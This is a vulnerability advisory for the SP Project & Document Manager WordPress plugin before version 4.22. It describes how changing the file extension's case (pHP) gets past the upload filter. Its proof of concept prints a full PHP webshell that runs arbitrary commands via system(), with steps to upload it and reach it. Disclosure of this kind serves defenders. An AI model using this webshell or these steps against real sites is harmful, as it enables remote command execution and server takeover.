WordPress Plugin Vulnerabilities
SP Project & Document Manager < 4.22 - Authenticated Shell Upload
Description
The plugin allows users to upload files, however, the plugin attempts to prevent php and other similar files that could be executed on the server from being uploaded by checking the file extension. It was discovered that php files could still be uploaded by changing the file extension's case, for example, from "php" to "pHP". The plugin does state that users can upload and manage files without limits, but also does attempt to prevent dangerous files from being uploaded, which was found to be inadequate.
Proof of Concept
1. Upload a webshell as web.php:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd']);
}
?>
</pre>
</body>
<script>document.getElementById("cmd").focus();</script>
</html>
2. Intercept the request
3. Rename the dlg-upload-file[] parameter from web.php with web.pHP
4. Visit http://website.com/wp-content/uploads/sp-client-document-manager/[user's uid]/web.php and use the webshell Affects Plugins
Fixed in version 4.22
References
Classification
Miscellaneous
Original Researcher
Viktor Markopoulos
Submitter
Viktor Markopoulos
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-05-25 (about 1 years ago)
Added
2021-05-25 (about 1 years ago)
Last Updated
2022-04-09 (about 11 months ago)